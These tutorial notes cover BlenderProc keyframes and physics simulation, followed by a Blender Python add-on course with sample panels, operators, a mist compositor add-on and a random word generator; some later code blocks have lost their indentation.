    Blender and BlenderProc use keyframes to render multiple images in one render call. This makes rendering the same scene (e.g. with only different camera poses) faster, since the meshes only need to be moved to the graphics card once.

    Concept

    When bproc.renderer.render() is called, Blender iterates over all keyframes in the interval [frame_start, frame_end - 1] and renders the scene once per keyframe. Each keyframe can therefore be assigned different attribute values, e.g. camera or object poses, which are set when the corresponding keyframe is rendered.

    Camera

    Initially, frame_start and frame_end are both set to 0. Calling bproc.camera.add_camera_pose(matrix_world) automatically adds a new keyframe (frame_end is increased by 1) and assigns the given camera pose to it. You can also assign a camera pose to a specific keyframe via bproc.camera.add_camera_pose(matrix_world, i); frame_end is increased accordingly if necessary.

    Objects

    When object poses are set, e.g. via obj.set_location(location), they are by default set for all keyframes. To assign an object pose to a specific frame, use the frame parameter, e.g. obj.set_location(location, frame=i).
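    A minimal sketch of per-frame poses, assuming an object obj and two 4x4 pose matrices tmat0 and tmat1 already exist:

    # Frame 0: first camera pose, object at the origin
    bproc.camera.add_camera_pose(tmat0, frame=0)
    obj.set_location([0, 0, 0], frame=0)
    # Frame 1: second camera pose, object moved up
    bproc.camera.add_camera_pose(tmat1, frame=1)
    obj.set_location([0, 0, 1], frame=1)
    # One render call now produces both frames
    data = bproc.renderer.render()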

    Debugging

    To inspect which keyframes are actually set, view them in BlenderProc's debug mode (see the quickstart for how to enter it). After running the script, switch to the Layout tab.

    In the Layout tab, the lower area of Blender shows the Timeline with the keyframes of the currently active object. Left-click the camera in the 3D view to see all registered camera poses; every registered keyframe is visualized by a yellow marker.

    You can change the currently active frame by moving the blue playhead or by setting the start/end numbers in the top right. The 3D view always shows the scene state assigned to the active frame (press Numpad 0 to look through the current camera).

    Render multiple times

    You can render multiple times within one session. The only thing to remember is to remove all keyframes at the start of each run, which is done by calling bproc.utility.reset_keyframes().

    So, assuming your python script has the following structure:

    <object loading>

    <light setting>

    <setting random object poses>

    <camera sampling>

    <rendering>

    <writing to file>

    To sample camera/object poses and render multiple times in one run, simply adjust it as follows:

    <object loading>

    <light creation>

    for r in range(NUM_RUNS):
        bproc.utility.reset_keyframes()

        <setting random object poses>

        <setting random light poses & strengths>

        <camera sampling>

        <rendering>

        <writing to file>

    Other attributes (e.g. object materials) cannot be keyframed, so all images of one render call will share the same materials. For such attributes it is better to call the render function more often with one or few keyframes and manipulate the scene between render calls.

    Physics simulation

    To place objects randomly on a given surface, for example, BlenderProc can use Blender's rigid body simulator. In short, the objects are dropped onto the surface and then fixed at the pose where they come to rest.

    Rigid body components

    For an object to take part in the simulation, its rigid body component must be enabled via .enable_rigidbody(). Through this function, all physical properties (mass, friction, etc.) can be specified.

    The parameter active

    This parameter determines whether the object actively takes part in the simulation, i.e. whether it should move (active=True), or only acts as an obstacle (active=False).

    The parameter collision_shape

    Choosing the collision_shape is crucial for a stable simulation. If your object is convex, or you don't mind its collision shape being its convex hull, keep the default CONVEX_HULL; this gives a fast and stable simulation.

    However, if you have non-convex objects and need precise results, CONVEX_HULL may not do. You can use MESH instead, but especially for objects with thin parts this makes the simulation very unstable, and your objects may penetrate each other.

    Convex decomposition

    obj.enable_rigidbody(active=True, collision_shape="COMPOUND")
    obj.build_convex_decomposition_collision_shape("<Path where to store vhacd>")

    First, the object's rigid body component is enabled with collision shape COMPOUND, meaning its collision shape is the union of the collision shapes of its children (the convex parts).

    The second command performs a convex decomposition of the object and sets the convex parts as children of the original object. These children are invisible in renders and serve only as collision shapes! Since the decomposition takes a few seconds of compute per object, the result is cached and automatically reused when the same object is decomposed again.

    Run the simulation

    Simulate and fix poses afterwards

    In the usual use case, run:

    bproc.object.simulate_physics_and_fix_final_poses(
        min_simulation_time=4,
        max_simulation_time=20,
        check_object_interval=1
    )

    This runs the simulation and afterwards fixes the final resting pose of every object (the simulation itself is discarded). While the physics simulation runs, the module checks at one-second intervals whether any objects are still moving; if not, the simulation stops. It runs for at least 4 and at most 20 seconds.

    bproc.object.simulate_physics_and_fix_final_poses() simulates physics and then bakes the final poses: the objects are simulated for a bounded amount of time, and afterwards their final locations and rotations in the scene are fixed. This is useful for adding realistic physical effects, e.g. simulating an object falling from a table onto the floor.

    Its parameters:

    • min_simulation_time (optional): minimum simulated time; default 4.
    • max_simulation_time (optional): maximum simulated time; default 20.
    • check_object_interval (optional): interval at which object poses are checked for movement; default 1.

    Note that the function only acts on objects that carry physics information: before calling it, each object must be marked for simulation by enabling its rigid body component, as described above.
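    Putting it together, a minimal sketch assuming spheres and ground were loaded earlier as in the physics positioning example above:

    # Mark the movable objects as active rigid bodies
    for obj in spheres:
        obj.enable_rigidbody(active=True)
    # The ground only acts as an obstacle
    ground.enable_rigidbody(active=False, collision_shape="MESH")
    # Simulate, then bake the resting poses
    bproc.object.simulate_physics_and_fix_final_poses(
        min_simulation_time=4,
        max_simulation_time=20,
        check_object_interval=1
    )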

    Just simulate

    If you want to render the simulation itself, use:

    bproc.object.simulate_physics(
        min_simulation_time=4,
        max_simulation_time=20,
        check_object_interval=1
    )

    This works like bproc.object.simulate_physics_and_fix_final_poses, but the whole simulation is kept, so rendering the scene afterwards shows the simulation itself.

    You may have to increase the render interval manually:

    # This will make the renderer render the first 100 frames of the simulation
    bproc.utility.set_keyframe_render_interval(frame_end=100)

    Examples

    • BlenderProc/README.md at main · DLR-RM/BlenderProc · GitHub

    • The core example collection of BlenderProc. Through these examples you learn how to run the BlenderProc pipeline and generate various kinds of rendered images.

      • Basic example: introduces BlenderProc's basic functionality and what happens when the pipeline runs.
      • Camera sampling: sampling different camera positions inside a shape, with rotation constraints.
      • Light sampling: sampling light poses inside a geometric shape.
      • Entity manipulation: selecting entities in the config file and changing their various parameters.
      • Material manipulation: selecting and manipulating materials.
      • Physics positioning: enabling simple simulated physical interaction between objects in the scene.
      • Semantic segmentation: generating semantic segmentation labels for a given scene.
      • Camera and object pose: loading and rendering models given camera intrinsics and extrinsics.

      We recommend starting with the basic example and working through the examples in order; this builds a solid grasp of BlenderProc's fundamentals before moving on to the more advanced ones.

    Course

    How to Generate Random Numbers

    Shows how to use random numbers.

    In the Python Console:

    • import random imports the random module.

    • random.uniform(0, 1) returns a random float in [0, 1], uniformly distributed.

    • random.choice(range(0, 10)) returns a random integer from 0 to 9 (10 excluded), uniformly distributed.

    In Blender, print() output can be viewed via Window - Toggle System Console.

    png

    An example of using random numbers in an add-on:

    import bpy
    import random
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import FloatProperty, PointerProperty, IntProperty


    class MyProperties(PropertyGroup):
        random_number: IntProperty(name='Random Number', default=0)
        text_list = ['A', 'B', 'C']
        icon_list = ['GHOST_DISABLED', 'MATERIAL', 'PINNED']


    class ADDONNAME_PT_main_panel(Panel):
        bl_label = "Main Panel"
        bl_idname = "ADDONNAME_PT_main_panel"
        bl_space_type = 'VIEW_3D'
        bl_region_type = 'UI'
        bl_category = "New Tab"

        def draw(self, context):
            layout = self.layout
            scene = context.scene
            mytool = scene.my_tool

            layout.label(text=mytool.text_list[mytool.random_number])
            layout.label(icon=mytool.icon_list[mytool.random_number])
            layout.prop(mytool, "random_number")
            layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
        bl_label = "Generate Random Number"
        bl_idname = "addonname.myop_operator"

        def execute(self, context):
            scene = context.scene
            mytool = scene.my_tool

            x = random.choice(range(0, 3))
            mytool.random_number = x
            print(x)

            return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
        for cls in classes:
            bpy.utils.register_class(cls)
        bpy.types.Scene.my_tool = PointerProperty(type=MyProperties)


    def unregister():
        for cls in classes:
            bpy.utils.unregister_class(cls)
        del bpy.types.Scene.my_tool


    if __name__ == "__main__":
        register()

    Run it: pressing Generate Random Number generates a random number and changes the panel label and icon accordingly.

    png

    Add-on Creation - Insta-Mist

    Compared with the earlier version of the code, some node-existence checks were added:

    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
        comp_node = tree.nodes.new('CompositorNodeComposite')
        comp_node.name = 'Composite'
    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
        render_layer_node = tree.nodes.new('CompositorNodeRLayers')
        render_layer_node.name = 'Render Layers'
    mix1 = tree.nodes.get('Mix')
    if mix1 is not None:
        tree.nodes.remove(mix1)

    mix2 = tree.nodes.get('Mix.001')
    if mix2 is not None:
        tree.nodes.remove(mix2)

    cr = tree.nodes.get('ColorRamp')
    if cr is not None:
        tree.nodes.remove(cr)

    This code is a Blender add-on that adds a mist effect in the 3D view. It consists of three classes: INSTAMIST_PT_main_panel, INSTAMIST_PT_sub_panel and INSTAMIST_OT_add_mist.

    INSTAMIST_PT_main_panel is the main panel class. It holds a single button, "Add Mist"; clicking it triggers the execute method of INSTAMIST_OT_add_mist, which toggles the mist effect.

    INSTAMIST_PT_sub_panel is a sub-panel that is shown only when the scene's view layer has the pass_mist property enabled. It exposes the start, depth and falloff properties, which control where the mist starts, how deep it extends and how it falls off.

    Finally, INSTAMIST_OT_add_mist is the operator class. Its execute method enables or disables the mist effect depending on the current state and edits the node tree accordingly: when enabling, it calls mist_comp_action to add the new nodes; when disabling, it removes them again.

    bl_info = {
        "name": "INSTAMIST",
        "author": "Darkfall",
        "version": (1, 0),
        "blender": (2, 90, 1),
        "location": "View3D > N > INSTA-MIST",
        "description": "Adds Mist to your scene along with arranging the compositor",
        "warning": "",
        "doc_url": "",
        "category": "Add Mist",
    }


    import bpy
    from bpy.types import Panel, Operator


    def mist_comp_action(context):
        tree = context.scene.node_tree

        comp_node = tree.nodes.get('Composite')
        if comp_node is None:
            comp_node = tree.nodes.new('CompositorNodeComposite')
            comp_node.name = 'Composite'
        comp_node.location = (700, 0)

        viewer_node = tree.nodes.new('CompositorNodeViewer')
        viewer_node.location = (700, 200)

        render_layer_node = tree.nodes.get('Render Layers')
        if render_layer_node is None:
            render_layer_node = tree.nodes.new('CompositorNodeRLayers')
            render_layer_node.name = 'Render Layers'
        render_layer_node.location = (-200, 0)

        mix_node = tree.nodes.new('CompositorNodeMixRGB')
        mix_node.location = (500, 0)
        mix_node.blend_type = 'ADD'
        mix_node.use_clamp = True

        mix2_node = tree.nodes.new('CompositorNodeMixRGB')
        mix2_node.location = (300, 0)
        mix2_node.blend_type = 'MULTIPLY'
        mix2_node.use_clamp = True

        cr_node = tree.nodes.new('CompositorNodeValToRGB')
        cr_node.location = (0, 0)
        cr_node.color_ramp.elements[0].color = (0.2, 0.2, 0.2, 1)
        cr_node.color_ramp.elements.new(position=0.27)

        link = tree.links.new

        link(mix_node.outputs[0], viewer_node.inputs[0])
        link(mix_node.outputs[0], comp_node.inputs[0])
        link(mix2_node.outputs[0], mix_node.inputs[1])
        link(cr_node.outputs[0], mix2_node.inputs[1])
        link(render_layer_node.outputs[0], mix_node.inputs[2])
        link(render_layer_node.outputs[3], cr_node.inputs[0])
        return {'FINISHED'}


    class INSTAMIST_PT_main_panel(Panel):
        bl_label = "INSTA-MIST"
        bl_idname = "INSTAMIST_PT_main_panel"
        bl_space_type = 'VIEW_3D'
        bl_region_type = 'UI'
        bl_category = "INSTA-MIST"

        def draw(self, context):
            layout = self.layout
            scene = context.scene

            layout.operator("instamist.add_mist_operator")


    class INSTAMIST_PT_sub_panel(Panel):
        bl_label = "INSTA-MIST Options"
        bl_idname = "INSTAMIST_PT_sub_panel"
        bl_space_type = 'VIEW_3D'
        bl_region_type = 'UI'
        bl_category = "INSTA-MIST"
        bl_parent_id = 'INSTAMIST_PT_main_panel'

        @classmethod
        def poll(cls, context):
            return context.scene.view_layers["ViewLayer"].use_pass_mist == True

        def draw(self, context):
            layout = self.layout
            scene = context.scene
            world = scene.world.mist_settings

            layout.prop(world, "start")
            layout.prop(world, "depth")
            layout.prop(world, "falloff")


    class INSTAMIST_OT_add_mist(Operator):
        bl_label = "Enable/Disable Mist"
        bl_idname = "instamist.add_mist_operator"

        def execute(self, context):
            scene = context.scene
            camera = bpy.data.cameras['Camera']
            vl = scene.view_layers["ViewLayer"]
            tree = scene.node_tree

            if vl.use_pass_mist == False:
                vl.use_pass_mist = True
                camera.show_mist = True
                if scene.use_nodes == False:
                    scene.use_nodes = True
                mist_comp_action(context)

            elif vl.use_pass_mist == True:
                vl.use_pass_mist = False
                camera.show_mist = False

                mix1 = tree.nodes.get('Mix')
                if mix1 is not None:
                    tree.nodes.remove(mix1)

                mix2 = tree.nodes.get('Mix.001')
                if mix2 is not None:
                    tree.nodes.remove(mix2)

                cr = tree.nodes.get('ColorRamp')
                if cr is not None:
                    tree.nodes.remove(cr)

                comp_node = tree.nodes.get('Composite')
                viewer_node = tree.nodes.get('Viewer')
                render_layer_node = tree.nodes.get('Render Layers')

                tree.links.new(render_layer_node.outputs[0], comp_node.inputs[0])
                tree.links.new(render_layer_node.outputs[0], viewer_node.inputs[0])
            return {'FINISHED'}


    classes = [INSTAMIST_PT_main_panel, INSTAMIST_OT_add_mist, INSTAMIST_PT_sub_panel]


    def register():
        for cls in classes:
            bpy.utils.register_class(cls)


    def unregister():
        for cls in classes:
            bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
        register()

    Run it! Pressing Enable/Disable Mist creates/removes the nodes in the Compositor, enabling/disabling the mist effect.

    png

    Press F12 to see the rendered result:

    png

    Lists - Create, Append and Remove

    Shows how to use python lists:

    • list.append() appends one element.
    • list.remove() removes one element.
    • list.extend() appends multiple elements.
    • list.clear() empties the list.
    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import EnumProperty, PointerProperty, StringProperty


    class MyProperties(PropertyGroup):

        my_enum: EnumProperty(
            name="Enumerator / Dropdown",
            description="sample text",
            items=[('OP1', "Append", ""),
                   ('OP2', "Remove", "")
                   ]
        )

        new_item: StringProperty()
        my_list = []


    class ADDONNAME_PT_main_panel(Panel):
        bl_label = "Main Panel"
        bl_idname = "ADDONNAME_PT_main_panel"
        bl_space_type = 'VIEW_3D'
        bl_region_type = 'UI'
        bl_category = "New Tab"

        def draw(self, context):
            layout = self.layout
            scene = context.scene
            mytool = scene.my_tool

            layout.prop(mytool, "my_enum", expand=True)
            layout.prop(mytool, 'new_item')
            layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
        bl_label = "Submit"
        bl_idname = "addonname.myop_operator"

        def execute(self, context):
            scene = context.scene
            mytool = scene.my_tool
            list = mytool.my_list
            enum = mytool.my_enum
            new_item = mytool.new_item

            a = 'alpha'
            b = 'beta'

            if enum == 'OP1':
                # note: the original "if a and b not in list" only tested b's membership;
                # both elements are checked explicitly here
                if a not in list and b not in list:
                    list.extend((a, b))
                if new_item != '':
                    if new_item not in list:
                        list.append(new_item)
            else:
                list.clear()
            print(list)

            return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
        for cls in classes:
            bpy.utils.register_class(cls)

        bpy.types.Scene.my_tool = PointerProperty(type=MyProperties)


    def unregister():
        for cls in classes:
            bpy.utils.unregister_class(cls)
        del bpy.types.Scene.my_tool


    if __name__ == "__main__":
        register()

    png

    How to Display Info Messages

    Introduces statements that print messages to the Info area:

    • self.report({'INFO'}, "This is a Custom Message")
    • self.report({'WARNING'}, "This is a Custom Message")
    • self.report({'ERROR'}, "This is a Custom Message")
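    These report calls live inside an Operator's execute method; a minimal sketch (the class name and operator id are just illustrative):

    import bpy
    from bpy.types import Operator

    class DEMO_OT_report(Operator):
        bl_label = "Report Demo"
        bl_idname = "demo.report_operator"

        def execute(self, context):
            # shows up in the Info area and in the status bar
            self.report({'INFO'}, "This is a Custom Message")
            return {'FINISHED'}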

    Why is it not Working? : Episode 1

    Shows how to debug errors.

    How to make a Random Word Generator

    A random word generator:

    bl_info = {
    "name": "Random Word Generator",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > Random Word Gen Tab",
    "description": "Generates a Random Phrase",
    "warning": "",
    "doc_url": "",
    "category": "Add Words",
    }

    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import IntProperty, PointerProperty, BoolProperty
    from random import randint


    class RandomWordGenProperties(PropertyGroup):

    list_a = ["A", "Dr", "Mr", "Mrs", "Our", "The"]

    list_b = ["Adorable", "Adventurous", "Agressive", "Agreeable", "Angry", "Annoyed", "Annoying", "Anxious", "Arrogant", "Attractive", "Average", "Awful", "Bad", "Beautiful", "Better", "Bewildered", "Bloody", "Blushing", "Bored", "Brainy", "Brave", "Breakable", "Bright", "Broken", "Bronze", "Busy", "Calm", "Careful", "Cautious", "Charming", "Cheerful", "Clean", "Clear", "Clever", "Cloudy", "Clumsy", "Colorful", "Comfortable", "Condemned", "Confused", "Cooperative", "Courageous", "Crazy", "Creepy", "Crowded", "Cruel", "Curious", "Cute", "Dangerous", "Dark", "Dead", "Defeated", "Defiant", "Delightful", "Depressed", "Determained", "Different", "Difficult", "Disgusted", "Doubtful", "Dull", "Eager", "Easy", "Elated", "Elegant", "Embarrassed", "Enchanting", "Encouraging", "Energetic", "Enthusiastic", "Envious", "Evil", "Excited", "Expensive", "Exuberant", "Faithful", "Famous", "Fancy", "Fantastic", "Fierce", "Filthy", "Fine", "Foolish", "Fragile", "Frail", "Frantic", "Friendly", "Frightened", "Frozen", "Funny", "Gentle", "Gifted", "Glamorous", "Gleaming", "Glorious", "Good", "Gold", "Golden", "Gorgeous", "Graceful", "Greiving", "Grotesque", "Grumpy", "Handsome", "Happy", "Healthy", "Helpful", "Helpless", "Hilarious", "Horrible", "Hungry", "Hurt", "Important", "Impossible", "Industrial", "Inexpensive", "Innocent", "Inquisitive", "Itchy", "Jelous", "Jolly", "Joyous", "Kind", "Lazy", "Light", "Lively", "Lonely", "Long", "Lovely", "Lucky", "Magnificent", "Misty", "Modern", "Motionless", "Muddy", "Mushy", "Mysterious", "Nasty", "Naughty", "Nervous", "Never-ending", "Nice", "Obedient", "Obnoxious", "Odd", "Old", "Old-fashoined", "Open", "Outrageous", "Outstanding", "Perfect", "Plain", "Pleasant", "Poised", "Poor", "Powerful", "Precious", "Proud", "Putrid", "Puzzled", "Quaint", "Real", "Relieved", "Repulsive", "Rich", "Righteous", "Rival", "Rusty", "Secret", "Scary", "Silver", "Silvery", "Selfish", "Shiny", "Shy", "Silly", "Sleepy", "Smiling", "Sore", "Sparkling", "Splendid", "Spotless", "Stalking", "Steady", "Strange", "Stranger", "Stupid", "Subtle", "Successful", "Super", "Talented", "Tame", "Tender", "Tense", "Terrible", "Thankful", "Thoughful", "Thoughtless", "Tired", "Tough", "Troubled", "Ugliest", "Ugly", "Unsightly", "Unusual", "Upset", "Uptight", "Vast", "Victorious", "Wandering", "Weary", "Wicked", "Wild", "Witty", "Worried", "Wrong", "Zelous"]

    list_c = ["Actor", "Anchor", "Antagonist", "Apple", "Angel", "Angle", "Army", "Astronaut", "Ball", "Balloon", "Beach", "Bear", "Beast", "Book", "Brain", "Cake", "Castle", "Coast", "Colony", "Complex", "Conundrum", "Core", "Crowd", "Dancer", "Detective", "Detector", "Devil", "Director", "Diver", "Driver", "Express", "Factory", "Family", "Forest", "Future", "Gamer", "Garden", "Hacker", "Hangman", "History", "House", "Idea", "Island", "Jail", "Jester", "Joker", "King", "Knight", "Lake", "Lighthouse", "Matrix", "Mind", "Monument", "Moon", "Mountain", "Navy", "Nail", "Night", "Office", "Officer", "Operator", "Page", "Park", "Path", "Pickle", "Pizza", "Place", "Planet", "Player", "Picture", "Price", "Prince", "Princess", "Prison", "Program", "Programmer", "Protagonist", "Queen", "Razor", "Rifle", "Ring", "Reptile", "Road", "River", "Science", "Situation", "Society", "Soldier", "Sound", "Steed", "Story", "Surface", "Tavern", "Tower", "Traveler", "Tree", "Undead", "Unicorn", "Vampire", "Warrior", "Wizard", "World", "Wolf", "Zombie"]

    number_1 : IntProperty(default= 0)
    number_2 : IntProperty(default= 0)
    number_3 : IntProperty(default= 0)

    number_4 : IntProperty(default= 1)

    word_count : IntProperty(default= 3, min= 1, max= 3, description= "Select How Many Words to be Generated")

    wc_bool : BoolProperty(default= False, description= "Selecting this Option will randomize the Word Count")


    class RANDOMWORDGEN_PT_main_panel(Panel):
    bl_label = "Random Word Generator"
    bl_idname = "RANDOMWORDGEN_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Random Word Gen"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    wc = mytool.word_count
    r_wc = mytool.wc_bool

    if r_wc == False:
    layout.prop(mytool, "word_count", text= "Word Count")
    row = layout.row()

    if wc >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if wc >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if wc >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    else:
    row = layout.row()
    if mytool.number_4 >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if mytool.number_4 >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if mytool.number_4 >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    layout.prop(mytool, "wc_bool", text= "Randomize Word Count")

    layout.operator("randomwordgen.myop_operator")


    class RANDOMWORDGEN_OT_my_op(Operator):
    bl_label = "Generate Random Words"
    bl_idname = "randomwordgen.myop_operator"


    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    a = 0

    b2 = len(mytool.list_a)
    b = b2 - 1

    c2 = len(mytool.list_b)
    c = c2 - 1

    d2 = len(mytool.list_c)
    d = d2 - 1

    e = 1
    f = 3

    r1 = randint(a, b)
    r2 = randint(a, c)
    r3 = randint(a, d)

    r4 = randint(e, f)

    mytool.number_1 = r1
    mytool.number_2 = r2
    mytool.number_3 = r3

    mytool.number_4 = r4

    return {'FINISHED'}


    classes = [RandomWordGenProperties, RANDOMWORDGEN_PT_main_panel, RANDOMWORDGEN_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= RandomWordGenProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    点击 Generate Random Words 就可以从单词库中生成一堆单词!

    png

    Application Timers

    这段代码是一个简单的 Blender Python 脚本,用于创建 10 个位置不同的立方体。该脚本使用了 Blender 的定时器功能,以便在指定时间间隔内反复调用函数 “run_10_times()”。

    首先,使用 import bpy 导入必要的 Blender Python 模块。

    然后,创建了全局变量 counter 和 loc, 分别用于追踪立方体数量和立方体位置。

    接下来定义函数 run_10_times(), 它会在启动定时器后被调用。该函数使用 bpy.ops.mesh.primitive_cube_add() 命令在场景中添加一个立方体。该命令需要一个位置参数,它将使用 loc 变量中的值来确定立方体的垂直位置。然后,counter 变量增加 1,loc 变量增加 2(以确保每个立方体都有不同的位置)。

    函数还打印出当前计数器值。

    如果 counter 变量的值达到 10,函数返回 None,以便停止定时器。否则,它将返回 0.5,以便等待一段时间(0.5s)后再次调用该函数。

    最后,通过 bpy.app.timers.register() 函数注册函数 run_10_times(),以便在 Blender 中启动定时器。该函数将在 Blender 界面中点击 “Run Script” 按钮后执行。

    总之,该脚本使用 Blender Python 的定时器功能,创建 10 个位置不同的立方体,每个立方体之间延迟一定时间。

    import bpy

    counter = 0
    loc = 0


    def run_10_times():
    global loc
    bpy.ops.mesh.primitive_cube_add(location=(0, loc, 0))
    global counter
    counter += 1
    loc += 2
    print(counter)
    if counter == 10:
    return None
    return 0.5


    bpy.app.timers.register(run_10_times)

    png

    Why is it not Working? : Episode 2

    这段代码是一个 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供了一些功能来添加粒子系统到选择的对象中。

    首先,导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    接下来定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了三个控件,包括两个用于设置粒子系统参数的属性和一个用于执行操作的按钮。

    然后定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.object.particle_system_add() 命令向选定的对象中添加了一个粒子系统。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    p_data = bpy.data.particles["ParticleSettings"]

    layout.prop(p_data, "count")
    layout.prop(p_data, "use_rotations")
    if p_data.use_rotations == True:
    layout.prop(p_data, "rotation_factor_random")
    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Add Particle System"
    bl_idname = "addonname.myop_operator"
    """Add a Particle System to your Selected Object"""


    def execute(self, context):
    scene = context.scene
    obj = context.object
    bpy.ops.object.particle_system_add()
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    The REDO Operator

    这段代码是 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供一个按钮,点击后会在当前场景中添加一个立方体。

    首先导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    然后定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了一个控件,即一个按钮,并使用 layout.operator() 函数将其添加到面板中。

    接着定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。bl_options 属性指定了操作符的行为,包括注册和撤销。loc 属性是一个 FloatVectorProperty,表示要添加的立方体的位置。

    execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.mesh.primitive_cube_add() 命令向当前场景中添加了一个立方体,位置由 self.loc 属性决定。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    • bl_options = {'REGISTER', 'UNDO'}

      • bl_options 是一个操作符的属性,用于指定该操作符的行为。它是一个包含字符串的集合,可以指定以下选项:

        • REGISTER:表示将该操作作为已注册的操作来显示,即将其添加到撤销历史记录中。如果未启用此选项,则执行该操作不会被记录在撤销历史记录中。
        • UNDO:表示该操作可被撤销。如果未启用此选项,则在执行该操作后无法撤消该操作。

        在代码示例中,bl_options 属性被设置为 {‘REGISTER’, ‘UNDO’},表示该操作符应被注册并可以被撤销。这样一来,当用户单击添加的按钮时,该操作的执行将被记录在撤销历史记录中,并且用户可以随时撤消该操作。

    • 在 Blender 中,可以使用 Ctrl + Z 快捷键或 Edit 菜单中的 Undo 命令来撤消先前执行的操作。如果你想一次性撤销多个操作,可以多次按下 Ctrl + Z 或多次选择 Undo 命令。

      如果你想恢复先前撤消的操作,可以使用 Ctrl + Shift + Z 快捷键或 Edit 菜单中的 Redo 命令来重做操作。同样,你可以多次按下 Ctrl + Shift + Z 或多次选择 Redo 命令以重复多个操作。

    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Button"
    bl_idname = "addonname.myop_operator"
    bl_options = {'REGISTER', 'UNDO'}

    loc : bpy.props.FloatVectorProperty()

    def execute(self, context):
    bpy.ops.mesh.primitive_cube_add(location=self.loc)
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!按下 Button 按钮后,将会生成一个正方体,同时出现一个 Dialogbox 用于控制正方体的位置。这个操作可以用 Ctrl+Z 来撤销。

    png

    API Changes and where to Find them?

    说 Blender 更新到 3.0 了,一些 API 发生了变化,可以从 Reference/Release Notes/3.0/Python API - Blender Developer Wiki 里查看,其实现在也可以 chatGPT。

    ]]>
    + 课程

    How to Generate Random Numbers

Shows how to use random numbers.

In the Python Console:

• import random: imports the random-number module
• random.uniform(0, 1): returns a random float between 0 and 1, uniformly distributed
• random.choice(range(0, 10)): returns a random integer from 0 to 9 (10 excluded), uniformly distributed

In Blender, the output of print() is shown under Window > Toggle System Console.
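A quick sanity check you can paste into the Python Console (a minimal sketch; the printed values will of course differ per run):

import random

print(random.uniform(0, 1))         # e.g. 0.4288890546751146
print(random.choice(range(0, 10)))  # e.g. 7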

An example that uses random numbers inside an add-on:

import bpy
import random
from bpy.types import Panel, Operator, PropertyGroup
from bpy.props import FloatProperty, PointerProperty, IntProperty


class MyProperties(PropertyGroup):
